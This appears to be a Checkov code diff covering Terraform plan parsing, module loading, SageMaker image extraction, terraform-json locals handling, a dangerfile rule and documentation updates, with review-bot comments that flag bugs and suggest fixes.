@@ -312,6 +334,7 @@ def formatdate(format_str: str, input_str: str) -> str: # SAFE_EVAL_DICT['range'] SAFE_EVAL_DICT["reverse"] = reverse SAFE_EVAL_DICT["sort"] = sort +SAFE_EVAL_DICT["zipmap"] = lambda *lists: dict(zip(*lists)) # noqa: B905 # type conversion @@ -338,6 +361,12 @@ def evaluate(input_str: str) -> Any: if input_str == "...": # don't create an Ellipsis object return input_str + if input_str.startswith("try"): + # As `try` is a saved word in python, we can't override it like other functions as `eval` won't accept it. + # Instead, we are manually replacing this string with our own custom string, so we can pass it to `eval`. + + # Don't use str.replace to make sure we replace just the first occurrence + input_str = f"{TRY_STR_REPLACEMENT}{input_str[3:]}" evaluated = eval(input_str, {"__builtins__": None}, SAFE_EVAL_DICT) # nosec return evaluated if not isinstance(evaluated, str) else remove_unicode_null(evaluated) diff --git a/checkov/terraform/image_referencer/provider/aws.py b/checkov/terraform/image_referencer/provider/aws.py index ff82822d4ed..beb5aa31c85 100644 --- a/checkov/terraform/image_referencer/provider/aws.py +++ b/checkov/terraform/image_referencer/provider/aws.py 
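Review bot: `if input_str.startswith("try"):` rewrites any expression that begins with those three letters, not only a `try(` call, and a `try(...)` nested inside another call (`upper(try(a, b))`) is not rewritten at all and reaches `eval` as a Python keyword, raising `SyntaxError`. Narrow the prefix test to `if input_str.startswith("try("):` and, if nested calls can occur here, replace the token by pattern rather than by slice: `input_str = re.sub(r'\btry\(', f'{TRY_STR_REPLACEMENT}(', input_str)` (`re` is imported at the top of this file). The comment about `str.replace` should then state why only the leading occurrence is wanted; `evaluate` continues past the hunk.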
@@ -84,6 +84,38 @@ def extract_images_from_aws_lightsail_container_service_deployment_version(resou return image_names +def extract_images_from_aws_sagemaker_image_version(resource: dict[str, Any]) -> list[str]: + image_names: list[str] = [] + + image_name = find_in_dict(input_dict=resource, key_path="base_image") + if image_name and isinstance(image_name, str): + image_names.append(image_name) + + return image_names + + +def extract_images_from_aws_sagemaker_model(resource: dict[str, Any]) -> list[str]: + image_names: list[str] = [] + + containers = resource.get("container") + if containers: + for container in force_list(containers): + if isinstance(container, dict): + name = container.get("image") + if name and isinstance(name, str): + image_names.append(name) + + containers = resource.get("primary_container") + if containers: + for container in force_list(containers): + if isinstance(container, dict): + name = container.get("image") + if name and isinstance(name, str): + image_names.append(name) + + return image_names + + # needs to be at the bottom to add the defined functions SUPPORTED_AWS_IMAGE_RESOURCE_TYPES = { "aws_apprunner_service": extract_images_from_aws_apprunner_service, @@ -91,4 +123,6 @@ def extract_images_from_aws_lightsail_container_service_deployment_version(resou "aws_codebuild_project": extract_images_from_aws_codebuild_project, "aws_ecs_task_definition": extract_images_from_aws_ecs_task_definition, "aws_lightsail_container_service_deployment_version": extract_images_from_aws_lightsail_container_service_deployment_version, + "aws_sagemaker_image_version": extract_images_from_aws_sagemaker_image_version, + "aws_sagemaker_model": extract_images_from_aws_sagemaker_model, } diff --git a/checkov/terraform/module_loading/module_finder.py b/checkov/terraform/module_loading/module_finder.py index be87780b31d..2c618748622 100644 --- a/checkov/terraform/module_loading/module_finder.py +++ b/checkov/terraform/module_loading/module_finder.py 
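Review bot: `extract_images_from_aws_sagemaker_model` repeats the same seven-line block for `container` and `primary_container`; looping over the two keys keeps one copy of the `force_list`/`isinstance`/`image` logic and makes further container keys a one-token change. Both new extractors accept only a plain string image name, which matches the other extractors in this file; a short docstring stating that interpolated (non-string) values are intentionally skipped would make that explicit:
```python
def extract_images_from_aws_sagemaker_model(resource: dict[str, Any]) -> list[str]:
    """Collect image names from the model's container and primary_container blocks; non-string values are skipped."""
    image_names: list[str] = []

    for container_key in ("container", "primary_container"):
        containers = resource.get(container_key)
        if not containers:
            continue
        for container in force_list(containers):
            if isinstance(container, dict):
                name = container.get("image")
                if name and isinstance(name, str):
                    image_names.append(name)

    return image_names
```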
@@ -51,9 +51,14 @@ def find_modules(path: str) -> List[ModuleDownload]: continue curr_md = None + comment_out = re.findall(r'/\*.*?\*/', content, re.DOTALL) for line in content.splitlines(): if not curr_md: if line.startswith('module'): + in_comment_out = [line for a in comment_out if line in a] + if in_comment_out: + # if the "module " ref in the comment out part + continue curr_md = ModuleDownload(os.path.dirname(os.path.join(root, file_name))) # also extract the name for easier mapping against the TF modules.json file @@ -105,14 +110,15 @@ def load_tf_modules( if not modules_to_load: modules_to_load = find_modules(path) - # To avoid duplicate work, we need to get the distinct module sources - distinct_modules = list({m.address: m for m in modules_to_load}.values()) + # load terraform managed modules first, before pulling out distinct modules, as address attribute changes + replaced_modules = replace_terraform_managed_modules(path=path, found_modules=modules_to_load) - replaced_modules = replace_terraform_managed_modules(path=path, found_modules=distinct_modules) + # To avoid duplicate work, we need to get the distinct module sources + distinct_modules = list({m.address: m for m in replaced_modules}.values()) downloadable_modules = [ (module_loader_registry, m) - for m in replaced_modules if should_download_module(m.module_link) + for m in distinct_modules if should_download_module(m.module_link) ] if run_parallel: diff --git a/checkov/terraform/modules/module_utils.py b/checkov/terraform/modules/module_utils.py index 5e8a3791d41..98165dd362d 100644 --- a/checkov/terraform/modules/module_utils.py +++ b/checkov/terraform/modules/module_utils.py 
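Review bot: `in_comment_out = [line for a in comment_out if line in a]` is a substring test against the text of every `/* … */` block, so a live `module "x" {` line is skipped whenever an identical line also appears inside a comment anywhere in the file (a commented-out copy above the real block is the typical case), and that module is then never downloaded or scanned. Deciding by the line's character offset against the comment spans tests position instead of text. The remainder of the loop, which builds the `ModuleDownload`, is outside this hunk and unchanged:
```python
comment_spans = [m.span() for m in re.finditer(r'/\*.*?\*/', content, re.DOTALL)]
offset = 0
for raw_line in content.splitlines(keepends=True):
    line_start, offset = offset, offset + len(raw_line)
    line = raw_line.rstrip("\r\n")
    if not curr_md:
        if line.startswith('module'):
            if any(start <= line_start < end for start, end in comment_spans):
                # the module block sits inside a /* ... */ comment; skip it
                continue
            # … unchanged: ModuleDownload creation and name extraction …
```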
@@ -242,7 +242,7 @@ def get_module_name(file_path: TFDefinitionKey) -> str | None: if not file_path.tf_source_modules: return None module_name = file_path.tf_source_modules.name - if file_path.tf_source_modules.foreach_idx: + if isinstance(file_path.tf_source_modules.foreach_idx, int) or file_path.tf_source_modules.foreach_idx: foreach_or_count = '"' if isinstance(file_path.tf_source_modules.foreach_idx, str) else '' module_name = f'{module_name}[{foreach_or_count}{file_path.tf_source_modules.foreach_idx}{foreach_or_count}]' return module_name diff --git a/checkov/terraform/plan_parser.py b/checkov/terraform/plan_parser.py index c666fe9fc13..7f2b103087d 100644 --- a/checkov/terraform/plan_parser.py +++ b/checkov/terraform/plan_parser.py @@ -3,11 +3,12 @@ import itertools import json import logging -from typing import Optional, Tuple, Dict, List, Any, cast +import os +from typing import Any, Dict, List, Optional, Tuple, cast from checkov.common.graph.graph_builder import CustomAttributes from checkov.common.parsers.node import ListNode -from checkov.common.util.consts import LINE_FIELD_NAMES +from checkov.common.util.consts import LINE_FIELD_NAMES, TRUE_AFTER_UNKNOWN from checkov.common.util.type_forcers import force_list from checkov.terraform.context_parsers.tf_plan import parse @@ -16,6 +17,7 @@ TF_PLAN_RESOURCE_CHANGE_ACTIONS = "__change_actions__" TF_PLAN_RESOURCE_CHANGE_KEYS = "__change_keys__" TF_PLAN_RESOURCE_PROVISIONERS = "provisioners" +TF_PLAN_RESOURCE_AFTER_UNKNOWN = 'after_unknown' RESOURCE_TYPES_JSONIFY = { "aws_batch_job_definition": "container_properties", 
@@ -27,6 +29,45 @@
 "aws_iam_user_policy": "policy",
 "aws_ssoadmin_permission_set_inline_policy": "inline_policy",
 "azurerm_portal_dashboard": "dashboard_properties",
+ "aws_vpc_endpoint_policy": "policy",
+ "aws_ecr_registry_policy": "policy",
+ "aws_acmpca_policy": "policy",
+ "aws_api_gateway_rest_api_policy": "policy",
+ "aws_backup_vault_policy": "policy",
+ "aws_cloudwatch_log_destination_policy": "access_policy",
+ "aws_cloudwatch_log_resource_policy": "policy_document",
+ "aws_oam_sink_policy": "policy",
+ "aws_codebuild_resource_policy": "policy",
+ "aws_dynamodb_resource_policy": "policy",
+ "aws_ecr_repository_policy": "policy",
+ "aws_ecrpublic_repository_policy": "policy",
+ "aws_efs_file_system_policy": "policy",
+ "aws_elasticsearch_domain_policy": "access_policies",
+ "aws_media_store_container_policy": "policy",
+ "aws_cloudwatch_event_bus_policy": "policy",
+ "aws_schemas_registry_policy": "policy",
+ "aws_glue_resource_policy": "policy",
+ "aws_iot_policy": "policy",
+ "aws_kms_key": "policy",
+ "aws_kinesis_resource_policy": "policy",
+ "aws_msk_cluster_policy": "policy",
+ "aws_networkfirewall_resource_policy": "policy",
+ "aws_opensearch_domain_policy": "access_policies",
+ "aws_opensearchserverless_access_policy": "policy",
+ "aws_redshift_resource_policy": "policy",
+ "aws_redshiftserverless_resource_policy": "policy",
+ "aws_s3_bucket_policy": "policy",
+ "aws_s3control_access_point_policy": "policy",
+ "aws_s3control_bucket_policy": "policy",
+ "aws_ses_identity_policy": "policy",
+ "aws_sesv2_email_identity_policy": "policy",
+ "aws_sns_topic_data_protection_policy": "policy",
+ "aws_sns_topic_policy": "policy",
+ "aws_sqs_queue_policy": "policy",
+ "aws_secretsmanager_secret_policy": "policy",
+ "aws_vpclattice_auth_policy": "policy",
+ "aws_vpclattice_resource_policy": "policy",
+ "google_project_iam_policy": "policy_data"
 }
@@ -161,10 +202,12 @@ def _prepare_resource_block( resource_address: str | None = resource.get("address") resource_conf[TF_PLAN_RESOURCE_ADDRESS] = resource_address # type:ignore[assignment] # special field - changes = resource_changes.get(resource_address) # type:ignore[arg-type] # becaus eit can be None + changes = resource_changes.get(resource_address) # type:ignore[arg-type] # because it can be None if changes: resource_conf[TF_PLAN_RESOURCE_CHANGE_ACTIONS] = changes.get("change", {}).get("actions") or [] resource_conf[TF_PLAN_RESOURCE_CHANGE_KEYS] = changes.get(TF_PLAN_RESOURCE_CHANGE_KEYS) or [] + # enrich conf with after_unknown values + _eval_after_unknown(changes, resource_conf) provisioners = conf.get(TF_PLAN_RESOURCE_PROVISIONERS) if conf else None if provisioners: 
@@ -175,6 +218,22 @@ def _prepare_resource_block( return resource_block, block_type, prepared +def _eval_after_unknown(changes: dict[str, Any], resource_conf: dict[str, Any]) -> None: + after_unknown = changes.get("change", {}).get(TF_PLAN_RESOURCE_AFTER_UNKNOWN) + if os.getenv('EVAL_TF_PLAN_AFTER_UNKNOWN') and after_unknown and isinstance(after_unknown, dict): + for k, v in after_unknown.items(): + # We check if the value of the field is True. That would mean its value is known after the apply + # We also check whether the field is not already present in the conf since we do not want to + # override it. Overriding can actually cause losing its value + if v is True and k not in resource_conf: + # We set the value to 'true_after_unknown' and not its original value + # We need to set a constant other than a boolean (True/"true"), + # so it will not collide with actual possible values of those attributes + # In these cases, policies checking the existence of a value will succeed, + # but policies checking for concrete values will fail + resource_conf[k] = _clean_simple_type_list([TRUE_AFTER_UNKNOWN]) + + def _find_child_modules( child_modules: ListNode, resource_changes: dict[str, dict[str, Any]], root_module_conf: dict[str, Any] ) -> dict[str, list[dict[str, dict[str, Any]]]]: @@ -212,7 +271,7 @@ def _find_child_modules( ( module_call_resource for module_call_resource in module_call_resources - if f"{module_address}.{module_call_resource['address']}" == resource["address"] + if f"{module_address}.{module_call_resource['address']}" == (resource["address"].rsplit('[', 1)[0] if resource["address"][-1] == "]" else resource["address"]) ), None ) 
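Review bot: `os.getenv('EVAL_TF_PLAN_AFTER_UNKNOWN')` treats any non-empty value as enabled, so `EVAL_TF_PLAN_AFTER_UNKNOWN=false` or `=0` switches the feature on; compare against an explicit set, e.g. `if os.getenv('EVAL_TF_PLAN_AFTER_UNKNOWN', '').lower() in ('1', 'true', 'yes') and isinstance(after_unknown, dict):`, and hoist the lookup out of the per-resource call if this is hot. Because the feature makes existence-style policies pass on values that are only known after apply, it deliberately weakens plan-time results, so the variable belongs in the CLI reference next to `RENDER_EDGES_DUPLICATE_ITER_COUNT` (documented in this same patch) together with that caveat. Nested `after_unknown` entries arrive as dicts or lists rather than `True` and are skipped by the `v is True` test; the comment should say whether that is intended.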
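Review bot: `resource["address"][-1] == "]"` raises `IndexError` on an empty address string, whereas `resource["address"].endswith("]")` is safe and reads better; the `rsplit` can also be bound once outside the generator instead of being recomputed for every `module_call_resource`: `plain_address = resource["address"].rsplit('[', 1)[0] if resource["address"].endswith("]") else resource["address"]`. A comment such as `# strip a trailing [idx]/["key"] so count/for_each instances match their module_calls entry` would explain the slicing. `_find_child_modules` continues on both sides of this hunk.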
@@ -242,6 +301,33 @@ def _get_module_call_resources(module_address: str, root_module_conf: dict[str, return cast("list[dict[str, Any]]", root_module_conf.get("resources", [])) +def _is_provider_key(key: str) -> bool: + """key is a valid provider""" + return (key.startswith('module.') or key.startswith('__') or key in {'start_line', 'end_line'}) + + +def _get_provider(template: dict[str, dict[str, Any]]) -> dict[str, dict[str, Any]]: + """Returns the provider dict""" + + provider_map: dict[str, dict[str, Any]] = {} + provider_config = template.get("configuration", {}).get("provider_config") + + if provider_config and isinstance(provider_config, dict): + for provider_key, provider_data in provider_config.items(): + if _is_provider_key(key=provider_key): + # Not a provider, skip + continue + provider_map[provider_key] = {} + for field, value in provider_data.get('expressions', {}).items(): + if field in LINE_FIELD_NAMES or not isinstance(value, dict): + continue # don't care about line #s or non dicts + expression_value = value.get('constant_value', None) + if expression_value: + provider_map[provider_key][field] = expression_value + + return provider_map + + def _get_resource_changes(template: dict[str, Any]) -> dict[str, dict[str, Any]]: """Returns a resource address to resource changes dict""" 
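Review bot: `_is_provider_key` returns `True` exactly for keys that are NOT providers (`module.` references, `__…` internals, `start_line`/`end_line`), yet its docstring says `key is a valid provider` and the call site reads `if _is_provider_key(key=provider_key): # Not a provider, skip`; rename it `_is_non_provider_key` or invert it so name, docstring and call site agree. In `_get_provider`, `if expression_value:` discards any constant that is falsy, so provider arguments set to `false`, `0` or `""` never reach `provider_map` and a policy that checks such a setting sees it as absent — use `if 'constant_value' in value: provider_map[provider_key][field] = value['constant_value']`. `provider_data.get('expressions', {})` also assumes `provider_data` is a dict; an `isinstance(provider_data, dict)` guard mirrors the one already applied to `provider_config`.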
@@ -293,11 +379,15 @@ def parse_tf_plan(tf_plan_file: str, out_parsing_errors: Dict[str, str]) -> Tupl :type tf_plan_file: str - path to plan file :rtype: tf_definition dictionary and template_lines of the plan file """ - tf_definition: Dict[str, Any] = {"resource": [], "data": []} + tf_definition: Dict[str, Any] = {"provider": [], "resource": [], "data": []} template, template_lines = parse(tf_plan_file, out_parsing_errors) if not template: return None, None + provider = _get_provider(template=template) + if bool(provider): + tf_definition["provider"].append(provider) + resource_changes = _get_resource_changes(template=template) for resource in template.get("planned_values", {}).get("root_module", {}).get("resources", []): @@ -349,13 +439,27 @@ def _clean_simple_type_list(value_list: List[Any]) -> List[Any]: return value_list -def _get_provisioner(input_data: List[Any]) -> List[Any]: +def _get_provisioner(input_data: List[Dict[str, Any]]) -> List[Dict[str, Dict[str, Any]]]: result = [] for item in input_data: - key = item['type'] - command_value = item['expressions']['command'] - if not isinstance(command_value, list): - command_value = [command_value] - transformed_item = {key: {'command': command_value}} - result.append(transformed_item) + if 'type' in item and 'expressions' in item: + key = item['type'] + expressions = item['expressions'] + transformed_expressions = {} + + if key == 'local-exec': + if 'command' in expressions: + command_value = expressions['command'] + if not isinstance(command_value, list): + command_value = [command_value] + transformed_expressions['command'] = command_value + + for field, value in expressions.items(): + if field != 'command': + transformed_expressions[field] = value + else: + transformed_expressions = expressions + + transformed_item = {key: transformed_expressions} + result.append(transformed_item) return result diff --git a/checkov/terraform/runner.py b/checkov/terraform/runner.py index 02581dab9d4..7135be36545 100644 
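Review bot: The `local-exec` branch of `_get_provisioner` copies `expressions` field by field only to special-case `command`, while the `else` branch aliases the original dict; both collapse to one copy plus one override. Items without `type`/`expressions` are now silently dropped where they previously raised `KeyError` — an improvement, but a `logging.debug` there keeps malformed plans diagnosable. `parse_tf_plan` in the first hunk can likewise drop the `bool()` in `if bool(provider):`:
```python
def _get_provisioner(input_data: List[Dict[str, Any]]) -> List[Dict[str, Dict[str, Any]]]:
    """Reshape plan provisioner entries to {type: expressions}; a local-exec 'command' is always a list."""
    result = []
    for item in input_data:
        if 'type' not in item or 'expressions' not in item:
            logging.debug(f"Skipping provisioner entry without type/expressions: {item}")
            continue
        key = item['type']
        transformed_expressions = dict(item['expressions'])
        if key == 'local-exec' and 'command' in transformed_expressions:
            command_value = transformed_expressions['command']
            if not isinstance(command_value, list):
                command_value = [command_value]
            transformed_expressions['command'] = command_value
        result.append({key: transformed_expressions})
    return result
```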
--- a/checkov/terraform/runner.py +++ b/checkov/terraform/runner.py @@ -362,7 +362,7 @@ def run_block( logging.warning(f"Failed to get module name for resource {entity_id}. {str(e)}") continue module_name = full_definition_path[module_name_index] - caller_context = definition_context[module_full_path].get(BlockType.MODULE, {}).get(module_name) + caller_context = definition_context.get(module_full_path, {}).get(BlockType.MODULE, {}).get(module_name) if not caller_context: continue caller_file_line_range = (caller_context.get("start_line", 1), caller_context.get("end_line", 1)) diff --git a/checkov/terraform/tf_parser.py b/checkov/terraform/tf_parser.py index 9be746d5950..2f8893286c4 100644 --- a/checkov/terraform/tf_parser.py +++ b/checkov/terraform/tf_parser.py @@ -48,6 +48,7 @@ def __init__(self, module_class: type[Module] = Module) -> None: self.module_address_map: Dict[Tuple[str, str], str] = {} self.loaded_files_map: dict[str, dict[str, list[dict[str, Any]]] | None] = {} self.external_variables_data: list[tuple[str, Any, str]] = [] + self.temp_tf_definition: dict[str, Any] = {} def _init(self, directory: str, out_evaluations_context: Dict[TFDefinitionKey, Dict[str, EvaluationContext]] | None, @@ -461,6 +462,7 @@ def parse_hcl_module_from_tf_definitions( ) self.add_tfvars(module, source) copy_of_tf_definitions = pickle_deepcopy(tf_definitions) + module.temp_tf_definition = tf_definitions # type:ignore # will be TFDefinitionKey and not string for file_path, blocks in copy_of_tf_definitions.items(): for block_type in blocks: try: 
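Review bot: `module.temp_tf_definition = tf_definitions  # type:ignore` attaches an ad-hoc attribute to the `Module` instance, while the attribute this patch declares (`self.temp_tf_definition` in the `__init__` hunk above) lives on the parser; unless `Module` declares the field as well, the type-ignore is hiding exactly the mismatch mypy would have reported. The stored value is the original `tf_definitions`, not the `pickle_deepcopy` taken on the preceding line, so whatever consumes `temp_tf_definition` sees any later in-place mutation of the caller's dict. A comment naming the consumer and why the uncopied reference is wanted, e.g. `# keep the original (not the deep copy) so the consumer sees the definitions as merged by the caller`, would make that reviewable; `parse_hcl_module_from_tf_definitions` continues past the hunk.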
@@ -699,13 +701,15 @@ def load_or_die_quietly( file: str | Path | os.DirEntry[str], parsing_errors: dict[str, Exception], clean_definitions: bool = True ) -> Optional[_Hcl2Payload]: """ -Load JSON or HCL, depending on filename. + Load JSON or HCL, depending on filename. :return: None if the file can't be loaded """ - file_path = os.fspath(file) file_name = os.path.basename(file_path) + if file_name.endswith('.tfvars'): + clean_definitions = False + try: logging.debug(f"Parsing {file_path}") diff --git a/checkov/terraform_json/parser.py b/checkov/terraform_json/parser.py index f355c0442d4..43ce1d811bc 100644 --- a/checkov/terraform_json/parser.py +++ b/checkov/terraform_json/parser.py @@ -65,9 +65,6 @@ def loads(file_path: Path) -> tuple[dict[str, Any], list[tuple[int, str]]]: content = read_file_with_any_encoding(file_path=file_path) - if not all(key in content for key in ("resource", "provider")): - return {}, [] - file_lines = [(idx + 1, line) for idx, line in enumerate(content.splitlines(keepends=True))] template: "dict[str, Any] | list[dict[str, Any]]" = loader.loads(content=content) 
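Review bot: `if file_name.endswith('.tfvars'): clean_definitions = False` silently overrides the keyword argument the caller passed, and the reindented docstring does not mention it; either document it (`:param clean_definitions: ignored for .tfvars files, which are never cleaned`) or rebind into a local name so the override is visible at the call site. `load_or_die_quietly` continues beyond the hunk.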
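Review bot: Dropping the `if not all(key in content for key in ("resource", "provider"))` pre-check means every JSON file that reaches `loads` is now fully parsed by `loader.loads`, including large, unrelated `.json` payloads, and any parser error on them now surfaces from here instead of being skipped. If the caller does not already restrict by extension or framework, a cheaper guard (a size ceiling, or a check that `content` contains at least one of the block-type keywords handled by `handle_block_type`) keeps the old fast path; the old check's exact form was too strict only because it required both keys. The rest of `loads` is outside the hunk, so I cannot see whether parser errors are caught there — a comment stating the expected failure mode would help.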
@@ -89,27 +86,37 @@ def prepare_definition(definition: dict[str, Any]) -> dict[str, Any]: if block_type == COMMENT_FIELD_NAME or block_type in LINE_FIELD_NAMES: continue - definition_new[block_type] = [] - for block_name, config in blocks.items(): - if block_name == COMMENT_FIELD_NAME or block_name in LINE_FIELD_NAMES: - continue - - if block_type in (BlockType.RESOURCE, BlockType.DATA): - # data/resource have an extra nested level resource_type -> resource_name -> resource_config - for resource_name, resource_config in config.items(): - if resource_name in IGNORE_FILED_NAMES: - continue - definition_new[block_type].append({block_name: {resource_name: hclify(obj=resource_config)}}) - elif block_type == BlockType.PROVIDER: - # provider are stored as a list, which we need to move one level higher to add the name - for provider_config in config: - definition_new[block_type].append({block_name: hclify(obj=provider_config)}) - else: - definition_new[block_type].append({block_name: hclify(obj=config)}) + definition_new[block_type] = handle_block_type(block_type=block_type, blocks=blocks) return definition_new +def handle_block_type(block_type: str, blocks: dict[str, Any]) -> list[dict[str, Any]]: + result: list[dict[str, Any]] = [] + + for block_name, config in blocks.items(): + if block_name == COMMENT_FIELD_NAME or block_name in LINE_FIELD_NAMES: + continue + + if block_type in (BlockType.RESOURCE, BlockType.DATA): + # data/resource have an extra nested level resource_type -> resource_name -> resource_config + for resource_name, resource_config in config.items(): + if resource_name in IGNORE_FILED_NAMES: + continue + result.append({block_name: {resource_name: hclify(obj=resource_config)}}) + elif block_type == BlockType.PROVIDER: + # provider are stored as a list, which we need to move one level higher to add the name + for provider_config in config: + result.append({block_name: hclify(obj=provider_config)}) + elif block_type == BlockType.LOCALS: + # a local block is 
stored as single dict + return [hclify(obj=blocks)] + else: + result.append({block_name: hclify(obj=config)}) + + return result + + def hclify( obj: dict[str, Any], conf: dict[str, Any] | None = None, diff --git a/checkov/version.py b/checkov/version.py index f841a9df8c9..42c6ea0b7d8 100644 --- a/checkov/version.py +++ b/checkov/version.py @@ -1 +1 @@ -version = '3.2.16' +version = '3.2.214' diff --git a/dangerfile.ts b/dangerfile.ts index df60e71bfbe..93afea89fc5 100644 --- a/dangerfile.ts +++ b/dangerfile.ts @@ -1,4 +1,4 @@ -const { danger, fail, schedule } = require('danger'); +const { danger, fail, schedule, warn } = require('danger'); const IGNORE_VAR = [ 'key', 's3_key', 's3_file_key', 'local_file_path', 'self.s3_bucket', 'e', 'error', 'str(e)', 'path', 'customer_name', @@ -86,3 +86,18 @@ async function failIfLoggingLineContainsSensitiveData() { } schedule(failIfLoggingLineContainsSensitiveData); + +async function alertPublicInterfaces() { + let changedFiles = danger.git.modified_files || []; + + for (const changedFile of changedFiles) { + if (changedFile.endsWith("report_types.py")) { + fail("You've changed `report_types.py` file, that contains the contract for checkov input and output. Make sure to stay backwards compatible.") + } + if (changedFile.endsWith("report.py") && !changedFile.includes("test")) { + fail("You've changed `report.py` file, that contains the contract for checkov input and output. Make sure to stay backwards compatible.") + } + } +} + +schedule(alertPublicInterfaces) diff --git a/docs/2.Basics/CLI Command Reference.md b/docs/2.Basics/CLI Command Reference.md index 03a11036d49..728abeb48e0 100644 --- a/docs/2.Basics/CLI Command Reference.md +++ b/docs/2.Basics/CLI Command Reference.md 
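Review bot: The `BlockType.LOCALS` case returns `[hclify(obj=blocks)]` from inside the `for block_name, config in blocks.items()` loop, so the per-name iteration is irrelevant for locals and, if every key happens to be a comment or line field, the loop ends and `[]` is returned instead; hoisting the check above the loop states the intent directly: `if block_type == BlockType.LOCALS: return [hclify(obj=blocks)]`. A one-line docstring such as `Convert one block type of a terraform-json definition into checkov's list-of-dict layout.` would also help, since the three shapes handled here are not obvious from the code.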
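Review bot: `changedFile.endsWith("report.py")` also matches any file whose name merely ends in `report.py` (a `sarif_report.py`, for instance), so unrelated changes trip the contract failure; anchor on the separator: `changedFile.endsWith("/report.py") && !changedFile.includes("test")`. `warn` is imported in the first hunk but never used — drop it, or use it for the softer of the two alerts. Only `danger.git.modified_files` is consulted, which is fine for a check on existing contract files but worth a one-line comment so nobody adds `created_files` by reflex.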
@@ -33,11 +33,11 @@ nav_order: 2 | `--soft-fail-on SOFT_FAIL_ON` | Exits with a 0 exit code if only the specified items fail. Enter one or more items separated by commas. Each item may be either a Checkov check ID(CKV_AWS_123), a BC check ID (BC_AWS_GENERAL_123), or a severity (LOW, MEDIUM, HIGH, CRITICAL). If you use a severity, then any severity equal to or less than the highest severity in the list will result in a soft fail. This option may be used with `--hard-fail-on`, using the same priority logic described in `--check` and `--skip-check` options above, with `--hard-fail-on` taking precedence in a tie. If a given result does not meet the `--soft-fail-on` nor the `--hard-fail-on` criteria, then the default is to hard fail. | | `--hard-fail-on HARD_FAIL_ON` | Exits with a non-zero exit code for specified checks. Enter one or more items separated by commas. Each item may be either a Checkov check ID (CKV_AWS_123), a BCcheck ID (BC_AWS_GENERAL_123), or a severity (LOW, MEDIUM, HIGH, CRITICAL). If you use a severity, then any severity equal to or greater than the lowest severity in the list will result in a hard fail. This option can be used with `--soft-fail-on`, using the same priority logic described in `--check` and `--skip-check` options above, with `--hard-fail-on` taking precedence in a tie. | | `--bc-api-key BC_API_KEY` | Prisma Cloud Access Key (see `--prisma-api-url`) [env var: BC_API_KEY] | -| `--prisma-api-url PRISMA_API_URL` | The Prisma Cloud API URL (see:https://prisma.pan.dev/api/cloud/api-urls). Requires `--bc-api-key` to be a Prisma Cloud Access Key in the following format: :: [env var: PRISMA_API_URL] | +| `--prisma-api-url PRISMA_API_URL` | The Prisma Cloud API URL (see:https://prisma.pan.dev/api/cloud/api-urls). Requires `--bc-api-key` to be a Prisma Cloud Access Key in the following format: `access_key_id::secret_key` [env var: PRISMA_API_URL] | | `--skip-results-upload` | Do not upload scan results to the platform. 
Use this to download configs, but only view results in the local output. | | `--image, --docker-image DOCKER_IMAGE` | Scan docker images by name or ID. Only works with `--bc-api-key flag` | | `--dockerfile-path DOCKERFILE_PATH` | Path to the Dockerfile of the scanned docker image | -| `--repo-id REPO_ID` | Identity string of the repository, with form / | +| `--repo-id REPO_ID` | Identity string of the repository, with form `repo_owner/repo_name` | | `-b, --branch BRANCH` | Selected branch of the persisted repository. Only has effect when using the `--bc-api-key` flag | | `--skip-download` | Do not download any data from Prisma Cloud. This will omit doc links, severities, etc., as well as custom policies and suppressions if using an API token. Note: it will prevent BC platform IDs from being available in Checkov. | | `--use-enforcement-rules` | Use the Enforcement rules configured in the platform for hard/soft fail logic, where the matching enforcement rule (or the default rule if no match) determines the behavior: skip checks below soft-fail threshold, include checks equal to or above hard-fail threshold in hard-fail list, and include checks in between in soft-fail list. Overrides can be applied using `--check`, `--skip-check`, `--soft-fail`, `--soft-fail-on`, or `--hard-fail-on`, but the order of applying `--check` and `--skip-check` (as described under `--check`) still applies here. Requires BC or PC platform API key. | 
@@ -55,10 +55,11 @@ nav_order: 2
 | `--output-baseline-as-skipped` | Output checks that are skipped due to baseline file presence |
 | `--skip-cve-package SKIP_CVE_PACKAGE` | Filter scan to run on all packages but a specific package identifier (deny list), You can specify this argument multiple times to skip multiple packages |
 | `--policy-metadata-filter POLICY_METADATA_FILTER` | Comma separated key:value string to filter policies based on Prisma Cloud policy metadata. See https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options for information on allowed filters. Format: policy.label=test,cloud.type=aws |
-| `--summary-position` {`top`, `bottom`} | Chose whether the summary will be appended on top (before the checks results) or on bottom (after check results), default is on top. |
+| `--summary-position` {`top`, `bottom`} | Choose whether the summary will be appended on top (before the checks results) or on bottom (after check results), default is on top. |
 | `--no-fail-on-crash ` | Return exit code 0 instead of 2 which indicates a failure in the integration with the platform |
 | `--enable-secret-scan-all-files CKV_SECRETS_SCAN_ENABLE_ALL` | Enable secret scan to scan all type of file |
 | `--scan-secrets-history` | Enable secret scan history of commits |
 | `--block-list-secret-scan CKV_SECRETS_SCAN_BLOCK_LIST` | List of files to filter out in the secret scanner |
 | `--support` | Enable debug logs and upload the logs to the server. Requires a Prisma Cloud API key. |
 | `--openai-api-key` | Add an OpenAI API key to enhance finding guidelines by sending violated policies and resource code to OpenAI to request remediation guidance. This will use your OpenAI credits. Set your number of findings that will receive enhanced guidelines using CKV_OPENAI_MAX_FINDINGS |
+| env variable: `RENDER_EDGES_DUPLICATE_ITER_COUNT` | Set the threshold to break out of calculating duplicate edges in the graph. This can be determined if you see `Reached too many edge duplications...` in the Checkov logs. Default: `4`. |
diff --git a/docs/3.Custom Policies/Examples.md b/docs/3.Custom Policies/Examples.md
index 342d0ffc04e..b479663e2d4 100644
--- a/docs/3.Custom Policies/Examples.md
+++ b/docs/3.Custom Policies/Examples.md
@@ -479,3 +479,16 @@ definition: - prod - prod-eu ``` + +## Creating an allow list of resource types + +The following policy only allows resources of type `aws_instance` and `aws_db_instance` to be provisioned. + +```yaml +definition: + cond_type: "resource" + resource_types: + - "aws_instance" + - "aws_db_instance" + operator: "exists" +```
diff --git a/docs/3.Custom Policies/Sharing Custom Policies.md b/docs/3.Custom Policies/Sharing Custom Policies.md
index cd4bf39599e..ef81b92ffa0 100644
--- a/docs/3.Custom Policies/Sharing Custom Policies.md
+++ b/docs/3.Custom Policies/Sharing Custom Policies.md
@@ -26,3 +26,5 @@ checkov --external-checks-git https://github.com/bridgecrewio/checkov.git//test For example, if you’re downloading this GitHub repository, but you only want to download the “extra_checks” directory, you can do the following: `https://github.com/bridgecrewio/checkov.git//extra_checks` + +Note: Checkov will execute Python code. Only use trusted sources when executing external checks.
diff --git a/docs/3.Custom Policies/YAML Custom Policies.md b/docs/3.Custom Policies/YAML Custom Policies.md
